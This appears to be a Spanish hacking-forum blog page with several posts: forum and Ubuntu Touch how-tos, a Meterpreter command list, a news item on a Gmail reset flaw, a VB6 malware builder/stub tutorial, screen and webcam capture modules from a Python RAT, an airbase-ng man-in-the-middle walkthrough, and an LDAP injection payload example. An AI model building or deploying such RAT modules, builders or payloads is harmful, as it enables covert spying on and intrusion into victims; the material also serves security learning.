Reemplazar el buscador del SMF por uno de Google

9:23 0 Comments A+ a-


Hola a todos, soy ANTRAX. En este tutorial voy a explicar cómo desactivar el buscador de los foros SMF para que el foro consuma menos recursos del servidor y reemplazarlo por uno que utilice los motores de búsqueda de google.
Comenzaremos entrando al FTP y nos dirigimos a la ruta  ./sources
Modificaremos el archivo Subs.php

Buscamos la linea 3910 que contiene lo siguiente:


'href' => $scripturl . '?action=search',

Y lo modificamos por la ruta en donde tendremos el buscador:

'href' => 'http://underc0de.net/buscador',

 Aprovechamos que estamos en la carpeta Sources y eliminamos estos 4 archivos: Search.php, SearchAPI-Custom.php, SearchAPI-Fulltext.php, SearchAPI-Standard.php


Ahora nos dirigimos a: . /Themes/default y buscamos el archivo index.templates.php

Buscamos la línea 142 y la borramos

Finalmente vamos a la ruta ./Themes/MI TEMA y modificaremos el archivo index.template.php

Buscamos y borramos la línea 147.

Ahora modificaremos el archivo index.php que se encuentra en el directorio principal del foro

Quitamos la línea 305 y 306

Una vez hecho todo esto, habremos eliminado por completo el buscador del SMF.

Ahora crearemos el nuevo buscador.
Nos dirigimos a: http://www.google.es/cse/manage/all y creamos un nuevo buscador
Llenamos todos los campos y damos click en Siguiente

Ahora pasamos a personalizar los colores, fuentes, etc.



Una vez finalizado, damos click en Siguiente y podremos ver el código de nuestro buscador.

Ahora abrimos el Notepad, colocamos lo siguiente


<html>
                <head>

CODIGO DEL BUSCADOR

                </head>
</html>

Lo guardamos con extension html y lo subimos a algún servidor.
Obviamente pueden cambiar el estilo de su buscador. Les muestro como quedo el mío:

Espero que les haya sido de utilidad!

Meterpreter de Metasploit

9:12 0 Comments A+ a-


Meterpreter es un Payload que se ejecuta después del proceso de explotación o abuso de una vulnerabilidad en un sistema operativo, meterpreter es el diminutivo para meta-interprete y se ejecuta completamente en memoria; evitando así tener problemas con los Antivirus.

Las características más importantes de este shellcode son:
1. Eliminación de archivos de Log.
2. Captura de pantalla.
3. Carga y descarga de archivos.
4. Copiar información.
5. Extracción de información de configuración

IDLETIME
Permite consultar el tiempo en el que el usuario de la maquina victima ha estado ausente.

SCREENSHOT
Permite extraer una imagen del escritorio remoto.

UICTL
Permite controlar algunos de los componentes del sistema afectado.

Password Database Commads

HASHDUMP
Permite consultar el contenido del la base de datos SAM en sistemas Windows.

BACKGROUND
Ejecuta la sesión actual en segundo plano para retornar a la línea de comandos de Meterpreter, para regresar a la sesión se ejecuta el comando tradicional (sessions –i 1).

MIGRATE
Permite migrarse a otro proceso en la maquina víctima.

File Systems Commands

LS
Permite visualizar los archivos en el directorio remoto actual.

DOWNLOAD
Permite descargar un archivo de la maquina atacada, es necesario hacer uso del back-slash doble en la ruta del mismo.

UPLOAD
Permite cargar un archivo en una ruta especifica, de la misma manera que el comando download es necesario hacer uso del doble slash al momento de indicar la ruta.

SEARCH
Permite buscar archivos en la maquina víctima, además:
1. Permite indicar el tipo de archivo.
2. Permite indicar la ruta donde se quiere realizar la búsqueda.

IPCONFIG
Permite visualizar todas la información de todas tarjetas de red existentes en la maquina atacada

ROUTE
Permite consultar y modificar la tabla de enrutamiento.

EXECUTE
Permite ejecutar un comando.

GETPRIVS
Permite obtener tantos privilegios de administración como sea posible.

GETUID
Permite consultar el tipo de usuario que la maquina victima esta ejecutando.

PS
Permite consultar todos los procesos que están en ejecución.

SHELL
Permite obtener un Shell, o línea de comando.

SYSINFO
Permite obtener información del sistema remoto como:

1. Nombre de la maquina.
2. Sistema Operativo.
3. Tipo de arquitectura.
4. Lenguaje del sistema operativo.

ENUMDESKTOPS
Permite consultar todas las sesiones (o escritorios).


Hackean Gmail con vulnerabilidad de reset password

17:04 0 Comments A+ a-


Oren Hafif, un investigador de seguridad ha descubierto una vulnerabilidad crítica en el proceso de restablecimiento de la contraseña de la cuenta de Google que permite a un atacante secuestrar cualquier cuenta.

Se las arregló para engañar a los usuarios de Google para que entreguen sus contraseñas a través de un ataque de phishing de lanza sencilla mediante el aprovechamiento de una serie de fallos, es decir, Cross-site request forgery (CSRF), y cross-site scripting (XSS), y un desvío de flujo.
En una prueba de concepto demostración en video, el atacante envía a su víctima una falsa “Confirmar propiedad de la cuenta” de correo electrónico, que dice provenir de Google.

La mención de enlace en el correo indica al destinatario para confirmar la titularidad de la cuenta e instó usuario cambiar su contraseña.


El enlace desde el correo electrónico aparentemente apunta a una URL HTTPS google.com, pero en realidad lleva a la víctima a la página web del atacante debido a un ataque CSRF con una dirección de correo electrónico personalizado.

La página de Google HTTPS se pedirá a la víctima para confirmar la propiedad mediante la introducción de su última contraseña y luego le pedirá para restablecer tu contraseña.


Pero en realidad el hacker a robado la nueva contraseña y galletas información mediante un ataque XSS en este paso.



Hafif informó a los ingenieros de Google Security con los detalles de esta vulnerabilidad de seguridad seria y Google ahora se ha ocupado de las cuestiones de parcheo. Google ha premiado el Sr. Hafif con 5.100 dólares bajo su Programa de Recompensas por Bug.

Instalar Ubuntu Touch 13.10 en nuestro Android

9:30 0 Comments A+ a-


El 17 de Octubre fue lanzado Ubuntu 13.10 (Saucy Salamander), el cual trae algunas mejoras si se le compara con la versión anterior. Sin embargo, lo más interesante del lanzamiento para nosotros es que incluye una versión estable de Ubuntu Touch para instalar en cualquier dispositivo móvil con soporte. Anteriormente podríamos disfrutar de las Betas y RC, pero la estabilidad era un tanto mala.

Por ahora solo son cuatro los dispositivos oficialmente soportados: Samsung Galaxy Nexus, LG Nexus 4, ASUS Nexus 7 y Samsung Nexus 10. Ya se están adaptando las versiones para que sean compatibles muchos más modelos.

Desgraciadamente, la versión para smartphones, no es tan fácil de instalar como para la versión de escritorio (con el .iso que nos podemos descargar desde la web, y en unos sencillos pasos, podremos crear una partición nueva, o usar la actual). Eso sí, los creadores, Canonical proporciona todas las herramientas necesarias para la instalación de Ubuntu Touch 13.10 y esta realmente es una buena noticia, porque instalar manualmente el sistema operativo puede ser una pesadez.


Antes de nada, hay que decir que aunque se trata de una versión estable, no es nada recomendable para su uso diario, si no más bien para probarlo. Canonical lleva meses trabajando en este sistema, y el trabajo que queda es mucho. Ubuntu Touch trae preinstaladas algunas aplicaciones nativas como Calendario, reloj, navegador, calculadora o tiempo. Pero esta versión está aún pensada para pruebas para usuarios experimentales. Pero vamos al lío para instalar Ubuntu en nuestros Nexus.
Instalar Ubuntu Touch de forma manual (Windows o Mac)

En nuestro Nexus, debemos ser ROOTo al menos el bootloader desbloqueado, y tener habilitada la opción de depuración USB. Para ello vamos a Ajustes > Información del teléfono y pulsamos 7 veces sobre “número de compilación” para desbloquear las opciones de desarrollo. Supongo que esto ya lo tendrías hecho de antes Ahora vamos a Ajustes > Opciones de desarrollo y activamos la opción “Depuración USB”.


Copia de seguridad de nuestro Android (opcional pero muy recomendable…)

Antes de continuar vamos a crear una copia de seguridad de nuestro dispositivo. Para ello conectaremos este a través de USB a nuestro Ubuntu y teclearemos en la consola el siguiente parámetro:

adb backup -apk -shared -all

De esta manera se nos creará un archivo con todos nuestros programas, configuraciones y nuestro SO que podremos restaurar posteriormente si no nos gusta el nuevo sistema operativo tecleando:

adb restore backup.ab

De esta manera nuestro nexus quedará como si no hubiéramos hecho nada con él.
Instalación de Ubuntu Touch

Descargar de aqui la versión de nuestro dispositivo. ¡OJO! Descarga la correcta!

Desde la herramienta del ADB, fastboot, instalamos bootloader, recovery y boot:

adb reboot fastboot
fastboot flash recovery saucy-preinstalled-recovery-armel+grouper.img
fastboot flash boot saucy-preinstalled-boot-armhf+grouper.img
fastboot flash system saucy-preinstalled-system-armel+grouper.img


Reiniciamos nuestro smartphone al recovery con:

adb reboot recovery

Copiamos el .zip a la carpeta que emula la /sdcard/ y lo renombramos a “autodeploy.zip” manualmente o con este código ADB

adb push /ruta/al/archivo/saucy-preinstalled-touch-armel+grouper.zip /sdcard/autodeploy.zip


Reiniciamos de nuevo al recovery. En este paso instalará el archivo copiado anteriormente

adb reboot recovery

YA! Al iniciar estarás en Ubuntu Touch
Para instalar desde Ubuntu

Desde el terminal, en nuestro PC, debemos instalar los siguientes paquetes en nuestro Ubuntu para comenzar a desarrollar con nuestro Nexus.

sudo add-apt-repository ppa:phablet-team/tools
sudo apt-get update
sudo apt-get install phablet-tools android-tools-adb android-tools-fastboot


(Copia de seguridad)
Instalar Ubuntu Touch en nuestro Nexus

Para completar la instalación debemos teclear el siguiente parámetro:

sudo phablet-flash ubuntu-system –no-backup

El proceso tardará un rato. Debemos esperar sin desconectar el dispositivo del PC ni interrumpir el progreso hasta que finalice y podamos ver Ubuntu Touch corriendo en nuestro Nexus.

Aquí viene la típica frase de…No nos hacemos responsables de que te cargues tu flamante Android.

Espero que les sea muy util.

Server Builder en VB6

8:10 0 Comments A+ a-

Hola a todos. En este tutorial les voy a enseñar a hacer un Builder para que puedan utilizarlo a la hora de programar un malware.
Les dejare un ejemplo bastante simple, y se los tratare de explicar lo mejor posible para que lo puedan entender sin problemas.
Primero debemos crear un nuevo proyecto con un EXE Estandar

Builder:


En el formulario colocaremos 2 TextBox y 1 Boton (Los labels son opcionales ya que no afectan al funcionamiento)


Y en su codigo lo siguiente:

Declaracion de variables:
'Declaraciones
Dim std As String

Boton Build:
Private Sub Command1_Click()

    Open App.Path & "\Stub.exe" For Binary As #1 'Busca y abre el Stub en el mismo dir en donde esta el cliente
    std = Space(LOF(1)) 'Space: Devuelve una cadena que consta del número especificado de espacios.
                        'LOF: Devuelve un valor Long que representa el tamaño, en bytes, de un archivo abierto mediante la función FileOpen.
    Get #1, , std 'Obtiene el valor de bytes de la variable std
    Put #1, , std & "{Dil}" 'Inserta un {Dil} al final del stub
    Put #1, , Text1.Text & "{Dil}" ' Coloca en el Stub lo ingresado en el text1 (DNS/IP) seguido de un {Dil}
    Put #1, , Text2.Text & "{Dil}" ' Coloca en el Stub lo ingresado en el text2 (Puerto) Seguido de un {Dil}
    
    MsgBox ("Listo!") ' Si todo esta bien muestra el mensaje de ok!

End Sub

Stub:
Ahora abrimos un nuevo proyecto y aqui crearemos el Stub que se modificara.
En el formulario ponemos 2 TextBox. Y en ellos mostraremos los valores que hemos ingresado desde el Builder


Y el codigo seria el siguiente:
Veriables:
'Declaraciones
Dim std As String
Form Load:
Private Sub Form_Load()

    Open App.Path + "\" & App.EXEName & ".exe" For Binary As #1
    std = Space(LOF(1))
    Get #1, , std
    Close #1
    
    Text1.Text = Split(std, "{Dil}")(1)
    Text2.Text = Split(std, "{Dil}")(2)
    

End Sub

No comente las lineas por que creo que esta mas que claro. En definitiva lo que hace es tomar lo ingresado en el Builder y colocarlo en el Text1 y Text2

Una vez hecho esto, generamos el *.EXE y lo colocamos en la misma carpeta del Builder.

Ahora corremos el Builder, colocamos los datos y revisamos.
Yo puse una NO-IP y un Puerto. Ahora revisamos el Stub para ver si aparecen correctamente los datos que ingresamos:

Como se puede ver, ejecute el Stub y me mostro los datos. Y si lo abro con un editor Hexadecimal, puedo ver el EOF con los datos ingresados.

Eso es todo, espero que les haya gustado! Luego les mostrare como meter el Stub dentro del Builder, para que directamente genere el ejecutable ya configurado.

Primeros pasos con Kali-Linux

8:07 0 Comments A+ a-


Hola a todos, esta es una guia rapida de que hacer despues de instalar Kali-Linux.

Como todos ya sabemos, Kali Linux es la continuacion del Backtrack y es una distro avanzada de Pentesting. Por comentarios que he leido y por lo que he alcanzado a comprobar, es una distro bastante estable basada en Debian y que puede ser usada como sistema base. Obviamente no estilo oficina, pero si para desarrollar, navegar y pentestear.

Para aquellos que ya hayan instalado el sistema operativo y no se puedan loguear, lo unico que deben hacer es presionar en Otro.. y loguearse con los siguientes datos:

User: root
Pass: (password que colocaron en la instalacion)

Una vez adentro, modificaremos los repo. En una consola coloquemos:
# nano /etc/apt/sources.list

Esto nos abrira el sources.list y colocamos las siguientes lineas debajo de la de kali

deb http://http.kali.org/kali kali main contrib non-free

deb http://security.kali.org/kali-security kali/updates main contrib non-free 

Y ahora para actualizar el sistema con los nuevos repositorios, colocamos lo siguiente en la consola:

# apt-get update && apt-get upgrade && apt-get dist-upgrade



Una vez finalizado, podremos instalar las aplicaciones normales como gedit, synaptic, etc

Espero que les sea de utilidad!

PyRAT - Screenshot y Webcam Capture

15:43 0 Comments A+ a-


Un nuevo avance de este prometedor RAT multiplataforma desarrollado en Python, acaba de salir a la luz. El mismo esta siendo programado por WhiZ, un usuario de Underc0de.
El día de hoy dos nuevas funciones fueron lanzadas al publico, las cuales consisten en capturar la pantalla y la webcam de la PC infectada.

screenshot.py

    #!/usr/bin/env python
    #-*- encoding:utf-8 -*-
    # screenshot.py
     
    from PyQt4.QtGui import QApplication, QPixmap
    from os import environ, mkdir, listdir
    from sys import argv
    from time import strftime, gmtime
     
    class Screenshot(object):
            def __init__(self):  
                    self.usuario = environ['USER']
                    if not 'screenshot' in listdir('./'):
                            mkdir('screenshot')
     
            def capturarPantalla(self):
                    time = strftime("%d %b %Y_%H:%M:%S", gmtime())
                    imagen = './screenshot/' + self.usuario + '_' + time + '.png'
     
                    app = QApplication(argv)
                    winId = QApplication.desktop().winId()
                    width = QApplication.desktop().screenGeometry().width()
                    height = QApplication.desktop().screenGeometry().height()
     
                    captura = QPixmap.grabWindow(winId, 0, 0, width, height)
     
                    captura.save(imagen)
     
    def main():
            ss = Screenshot()
            ss.capturarPantalla()
     
    if __name__ == '__main__':
            main()
webcamCapture.py


    #!/usr/bin/env python
    #-*- encoding:utf-8 -*-
    # webcamCapture.py
     
    from pygame.image import save
    import pygame.camera as camera
    from os import environ, mkdir, listdir
    from time import strftime, gmtime
     
    class WebcamCapture(object):
            def __init__(self):
     
                    camera.init()
                    misWebcams = camera.list_cameras()
     
                    if len(misWebcams) == 0:
                            raise Exception('No hay webcam disponible.')
                            exit()
     
                    elif len(misWebcams) == 1:
                            self.miWebcam = misWebcams[0]
     
                    else:
                            for i in range(len(misWebcams)):
                                    try:
                                            self.miWebcam = misWebcams[i]
                                            break
                                    except:
                                            continue
     
            def capturar(self):
                    try:
                            webcam = camera.Camera(self.miWebcam,(640,480))
                            webcam.start()
     
                            self.captura = webcam.get_image()
                           
                            webcam.stop()
                    except Exception as e:
                            print e
     
            def guardarCaptura(self):
                    self.usuario = environ['USER']
     
                    if not 'webcam' in listdir('./'):
                            mkdir('webcam')
     
                    tiempo = strftime("%d %b %Y_%H:%M:%S", gmtime())
                    imagen = './webcam/' + self.usuario + '_' + tiempo + '.png'
     
                    save(self.captura, imagen)
     
    def main():
            wcCapture = WebcamCapture()
            wcCapture.capturar()
            wcCapture.guardarCaptura()
     
    if __name__ == '__main__':
            main()



Airbase-ng

11:39 0 Comments A+ a-


Aribase-ng es herramienta multiproposito apuntada contra clientes como se opone a  el punto de acceso (AP) mismo. Desde que es tan versátil y flexible, resumirlo es un reto. Aquí hay una cierta cantidad de la característica a gran altura listas:

- Los implementos el cliente coffe latte WEP atacan

- Los implementos el cliente contratado WEP atacan

- La habilidad para capturar el handshake del WPA/WPA2

- La habilidad a actuar como un punto de acceso ad hoc

- La habilidad a filtrar por SSID o direcciones de la MAC del cliente

- La habilidad para manipular y envíar paquetes

- La habilidad para enviar paquetes encriptados y desifrar packetes encriptados.

La idea principal es de la implementación es que debería alentar a los clientes a asociarse con el AP falso, e impedir que accedan al AP verdadero.
Como los clientes verdaderos muy probablemente enviarán las peticiones de la sonda para redes / configuradas comunes, estos marcos son importantes para comprometer a un cliente a nuestro softAP. En este caso, el AP responderá a cualquier petición de la sonda con una respuesta correcta de la sonda, lo cual le dice al cliente que autentique para el airbase.ng BSSID. Que siendo dicho, este modo posiblemente podría desestabilizar la funcionalidad correcta de nuestro Aps en el mismo canal.

Opciones
-H   - - help     comando ayuda
-a   (bssid)         si el BSSID no es explícitamente especificado por el uso de "-a (bssid)", entonces se utiliza el vigente, MAC de la interfaz especificada.
-i (iface)            capturado y el proceso para esta interfaz, además de la interfaz de repetición

-w                      (WEP key)  WEP si debe utilizar el cifrado, el parámetro - w (wep clave) . esto es suficiente para que airbase-ng establezca todas las banderas apropiadas por sí mismo. Si el softAP funciona con el cifrado WEP, el cliente puede optar por utilizar la autenticación de sistema abierto o la autenticación de clave compartida. Ambos métodos de autenticación son compatibles con la base aerea-ng. pero para conseguir un flujo de clave, el usuario puede tratar de forzar al cliente a utilizar autenticacion clave compartida. "-S" fuerza una autenticación de clave compartida  "-S (len)".

-h (MAC)            Esta es la fuente de MAC para el ataque man-in-the-middle. El "-M", también se especifica

-f   (disallow)      Si no se especifica esta opción, el valor predeterminado es "-f allow". Esto significa que los todos los clientes pueden  (-d y-D) definen que  clientes puede aceptar.
Mediante el uso de la opción "-f disallow ", esta selección inversa y causa airbase-ng ignore a los clientes especificados por los filtros

-W   (0|1)
Esto establece el WEP bandera beacon. Recuerde que los clientes normalmente sólo se conectarán con los puntos de acceso, que son los mismos que guardarlos. Es decir WEP a WEP, abra abrir.
La opción "auto" es permitir que airbase-ng para ajustar automáticamente el indicador basado en el contexto de las demás opciones especificadas. Por ejemplo, si se establece una clave WEP con-w, entonces la bandera beacon se establece en WEP
Otro uso de "auto" es tratar con clientes que pueden ajustar automáticamente el tipo de conexión. Sin embargo, son pocos y distantes entre sí. En la práctica, lo mejor es fijar el valor al cliente f tipo de que se trata..

-q                       No mostrar datos de estadística o información del estado.

-v                        Esto imprime detalles y mensajes adicionales para ayudar en depurar.

-M                       Esta opción no es implementada aún, espera un ataque de man-in-the-midle entre BSSIDs y clientes especificados.

-A   - - ad-hoc
airbase-ng para actuar como un cliente de ad-hoc en lugar de un punto de acceso normal.
En el modo ad-hoc airbase-ng también envía beacons, pero no necesita ningún Autenticación / asociación. que se puede activar mediante el uso de "-A". el soft AP ajustar todas las banderas necesarias para simular una estación en el modo ad-hoc automáticamente y generar una MAC aleatoria, que se utiliza como CELL Mac en lugar de el BSSID. Esto puede ser sobre escrito por el (-a (bssid) tag. La interfaz de MAC se utilizará entonces como fuente de mac, que se puede cambiar con "-h (sourceMAC)"


-Y  (in|out|both)
El parámetro "-Y" permite el modo "procesamiento externo". esto crea una segunda interfaz "atx", que se utiliza para reenviar / modificar / eliminar o inyectar paquetes a voluntad. esta interfaz también debe ser vista con ifconfig y se necesita una herramienta externa para crear un bucle de una la interfaz de ella.
La estructura de paquete es bastante simple: la cabecera de Ethernet (14 bytes) se ignora y justo después de que sigue  la completa iee802.11 el marco de la misma forma en que va a ser procesada por airbase-ng (para los paquetes entrantes) o antes que los paquetes serán enviado de la tarjeta inalámbrica (paquetes salientes). Este modo intercepta todos los paquetes de datos y los bucles. El MAC e IP de la segunda interface grifo no importa, como tramas Ethernet reales en esta interfaz se dejan caer  de todos modos.
Hay 3 argumentos para "-Y": "in", "out" y "both", que especifica la dirección de marcos para recorrer la aplicación externa. Obviamente "in" redirecciona marcos sólo entrantes (a través de la tarjeta de red inalámbrica), mientras que las tramas salientes no serán tocados. "out" no todo lo contrario, sólo lazos de paquetes salientes y "both" envía todos ambas direcciones a través de la segunda interface conectada.
Hay una pequeña aplicación sencilla de ejemplo para reinyectar paquetes en la sengunda interface. La herramienta es “ replay.py ”  y está ubicada adentro “. /test ”. esta escrita en phyton, Utiliza pcapy para leer los paquetes y scapy para alterar / mostrar tal y reinyectar los frames o paquetes. la herramienta simplemente reproduce todos los marcos e imprime un breve resumen de la variable frames.el "paquete" recibido contiene el completo paquete ieee80211 , que puede ser fácilmente disifrado y modificar mediante scapy.
Esto puede ser comparado con filtros del ettercap, pero es más poderoso, como idioma realmente programado puede usarse para construir lógica complicada para filtrar y la adecuación del paquete. Lo negativo en python es que la suma un retraso es de alrededor de 100ms y las utilizaciones del cpu es bastante grande en una red alta de velocidad. Pero es perfecto para una comprobación con sólo algunas líneas de código.

-c   (channel)
Para indicar por que canal va a correr el punto de acceso.

-X     - - hidden   Esto causa que el punto de acceso le esconda al SSID y  no difundir el valor.

-s
    Estando especificado, esto fuerzas autenticación shared key  para todos los clientes. El soft AP le enviará a un método de autenticación desestimación infundada a cualquier petición manifiesta de autenticación de sistema si “ - s ” son especificadas.
-S
Envío tamaño de la llave compartida que sera enviada, la cual puede ser de cualquier clase siendo así de 16 a 1480 por defecto son 128 bytes.es un numero de bits usado de manera aleatoria para para los diferentes tamaños de etiquetas con un valor máximo de 255 bytes, Muchos clientes ignoran valores diferentes que 128 bytes que de tal manera esta opción no siempre puede trabajar

-L        - - caffe-latte
Airbase-ng también contiene el ataque nuevo de coffe-late, lo cual es también implementado en aireplay-ng como el ataque “ - 6 ”. Puede ser usado con “ - L ” o “ caffe-latte ”.  Este ataque específicamente obra en contra de clientes, como espera para una petición difundida ARP, lo cual acierta a ser un ARP. Luego lanza a algunos bits en el remitente MAC e IP. Corrige el valor ICV (crc32) y envía de regreso al cliente. El punto por qué este ataque surte efecto en la práctica es que en Windows envía paquetes mínimos ARP´s  gratuitos después de una conexión en capa 2 es establecido y una ip estática, o DHCP fracasa y    Windows asignaron a un IP puesto de 168.254.x.x.

- x  ” Coloca el número de paquetes por segundo para enviar al realizar el ataque de caffe-latte. Por el momento, este ataque no se detiene, continuamente envía peticiones del arp. Airodump-ng es necesario para captar respuestas.

-N   - -cfrag
Este ataque escucha un paquete ARP de petición o IP del cliente. Una vez que una es recibida, una parte pequeña una entrada de PRGA es extraída y entonces usada para crear un paquete de petición ARP dirigido a sectores específicos para el cliente. Esta petición ARP realmente hizo de arriba de fragmentos múltiples del paquete algo semejante que cuando recibió, el cliente responderá. que este ataque marcha especialmente bien en contra de redes ad hoc. Igualmente puede ser usado en contra de clientes del softAP y clientes normales AP.

-x (nbpps)   Esto coloca el número de paquetes por en segundo lugar que al paquete le sea enviado (por defecto: 100).

-y      cuando se utiliza esta opción, el falso AP no responderá a difundir sondeos. Una sonda de emisión es donde el AP específica no está identificado de forma única. Por lo general, la mayoría Aps responderá con respuestas muestra a una sonda de emisión. Esta bandera será impedir que esto suceda. Es sólo responderá cuando se solicita únicamente la AP específica.

-0 habilita en los tags en todos los paquetes enviados WPA/WPA2/WEP. incompatible con  –z y –Z.

-z      Esto especifica a la WPA que etiqueta tendrán los beacons . Los valores válidos son: 1=wep40 2=TKIP  3=WRAP  4=CCMP  5=WEP104.

-Z     lo mismo que –z pero para wpa2

-V      Esto especifica los tipos válidos EAPOL. Los valores válidos son:  1=MD5 2=SHA1  3=AUTO

-F
Esta opción hace que airbase-ng escriba todos paquetes enviados y recibidos en un archivo pcap. Éste es el prefijo del archivo (como en  airodump-ng – w)

-P    el punto de acceso falso  responde a todas los sondeos a pesar de los ESSIDs especificados.
   
-I      establece un intervalo de tiempo entre  cada beacon en milisegundo.

-C      los ESSID de la tarjeta también seran enviados en los beacons estableciendo un valor un valor tipioco es  “-c 60” ( requiere –P )

Opciones de filtrado
--bssid     -b       BSSID para filtro/usar
--bssids , -B     leer lista de BSSIDs de archivo.
--client   , -d    MAC del cliente aceptado.
--clients -D   leer lista de MACs de archivo
--essid  , -e
Especifique a un ESSID
--essids  , -E      leer los essid de un archivo

Tiene muchas funciones pero les enseñare una interesante va
En este ejemplo veremos una de las opciones mas interesantes que es la opcion man in the midle funciona bien en la version 1.2 de aircrack-ng y es la mas interesante puesto que es una de opcion que nos genera mucho trafico lo que estamos ejecutando es que la victima este saltando entre el ap verdadero y el falso sino mal recuerdo tambien es conocido como el hirtet attack bueno
Primero tenemos que conocer información de nuestra victima como lo es la mac el nombre del ap o el essid segundo tener algun cliente,en mi caso cambien la mac de mi antena por la mac del ap con macchanger para mayor efecto la sintaxis es la siguiente:

Airbase-ng –M  -h (mac fuente para el man in the midle) –-bssid (mac del ap) –d (mac destino client ) –v –F (es para crear un archivo .cap) interface
La opción –M es para realizar el ataque man in the midle casi siempre va acompañado de –h que es la opción que indicara la mac fuente para realizar el ataque asi que necesitas conocer tu mac es opcional cambiarla como dije antes yo si la cambie,-d es para especificar el cliente víctima que claro tiene que ser el mas activo pobre si esta descargando algo, la opción –v es para mostrar mas detalles en proceso –F es para crear un archivo .cap de todo el trafico que esto produce.



En la siguiente imagen se puede apreciar un poco el efecto que esto tiene y en airodump-ng vemos que cambia el nombre del ap por default esto pasa porque no especificamos con airbase-ng un essid



Autora: Aika

LDAP Injection (Lightweight Directory Access Protocol)

14:54 0 Comments A+ a-

LDAP

Las siglás de "LDAP" hacen referencia a "Lightweight Directory Access Protocol" o en español "Protocolo Ligero de Acceso a Directorios", es un protocolo de acceso ligero a directorios en el cual hay almacenado un conjunto de información de una red especifica. Existen distintas versiones de LDAP, por ejemplo, en Windows existe "Active Directory", es un servicio de directorio perteneciente a Microsoft, es decir, es como un protocolo de LDAP compatible con Windows, también existe Apache directory service, supongo que muchos ya deben conocer Apache. En LDAP se ejecutan querys/consulta, es un poco parecido a SQL.

Inyección LDAP

Entonces, con la definición de LDAP ya tenemos nuestras deducciones sobre que es la Inyección "LDAP" , La inyección LDAP básicamente es una técnica con la cúal "alteramos" los datos de validación de entrada que ejecutamos al procesar una acción, es casi parecida a la Inyección SQL pero está usa filtros, por ejemplo, Tenemos un formulario HTML con el cual vamos a hacer una búsqueda de texto en un sitio web; procesamos los datos de entrada y nos da como resultado si se encontró algún texto que este relacionado con lo ingresado. Podemos alterar la consulta que se ejecuta en el protocolo LDAP de manera que nos devuelva como por ejemplo la credencial de X usuario de una cédula de identidad. De la siguiente manera:

Escenario

Formulario HTML:

    Búscar: 
    
Más o menos ese sería el formulario, entonces, cuando ejecutamos esto se ejecuta una query de parte de LDAP procesando los datos, de la siguiente manera:

Procesamiento:

    string user = Request.Querystring("user")
    String ldapSearchQuery = "(cn=" + user +")";
Allí, Con Request.Querystring("user") estamos requiriendo en la query la cadena de la entrada "user", es decir, del input user, en la otra línea estamos haciendo una BUSQUEDA de un string/cadena, y hacemos entre los parentesis un filtro con el cúal usamos el atributo "cn" (nombre común o Common Name), entonces, esto sería igual a una concatenación de los datos enviados en el input.

Entonces, si un atacante ejecuta lo siguiente en el formulario:

"m5f3r0)(|(email=*)"

Básicamente ya tenemos una idea de lo que hace, esto nos retornara el email del usuario "m5f3r0"

Allí, los filtros serían lo que va entre parentesis (), también estamos haciendo uso del operador lógico OR | , existen otros dos como AND & y NOT ! .

Podemos notar en la consulta del procesamiento que usamos "string" y "String" ambos significan el llamado de una cadena.

Hemos logrado alterar la consulta como si fuese una ejecución remota, entonces, mediante la validación de entrada hemos retornado un valor "privado" de un usuario.

Operadores lógicos:

AND: &
OR: |
NOT: !


Para hacer uso de los operadores lógicos, iniciamos con un paréntesis () (filtro). y entre el paréntesis colocamos el operador , luego iniciamos con otro paréntesis con el atributo y su respectivo valor.

(&(atributo=resultado))

Y si colocamos otro atributo simplemente luego de eso abrimos otro parentesis. De está misma forma, podemos usar otros operadores.

Creación de consultas

Para la creación de consultas debemos tener conocimientos básicos acerca de como funcionan algunos filtros de LDAP, operadores, uso de atributos, etc. Para ello, existe mucha documentación en línea que con leerla les garantizo que ya sabrán crear sus propias consultas. Aquí les dejo algunos sitios para aprender mucho más:

http://wiki.bizagi.com/es/index.php?title=Atributos_LDAP
http://www.elladodelmal.com/2007/10/ldap-injection-blind-ldap-injection.html

Bueno, eso ha sido todo, espero les haya gustado el tema aunque fuese poco con poca documentación, actualmente estoy estudiando más está técnica ya que es un POCO complicada, a pesar de la poca información que existe en la red. Tal vez haga más post con más información completa acerca de esto mismo.

- Créditos:

- M5f3r0: Por el post y las explicaciones acerca de la Inyección LDAP.
- Elladodelmal: Por el post acerca de la inyección LDAP, fue mi guía de referencia y allí es dónde estoy estudiando más acerca de está técnica.
- e-securing.com: Otra guía de referencia, y la query/consulta de búsqueda de una cadena/string me la hice en base al planteamiento dado allí.

- Referencias:

http://es.wikipedia.org/wiki/LDAP
http://www.e-securing.com/novedad.aspx?id=59
http://www.elladodelmal.com/2007/10/ldap-injection-blind-ldap-injection.html

Autor: M5f3r0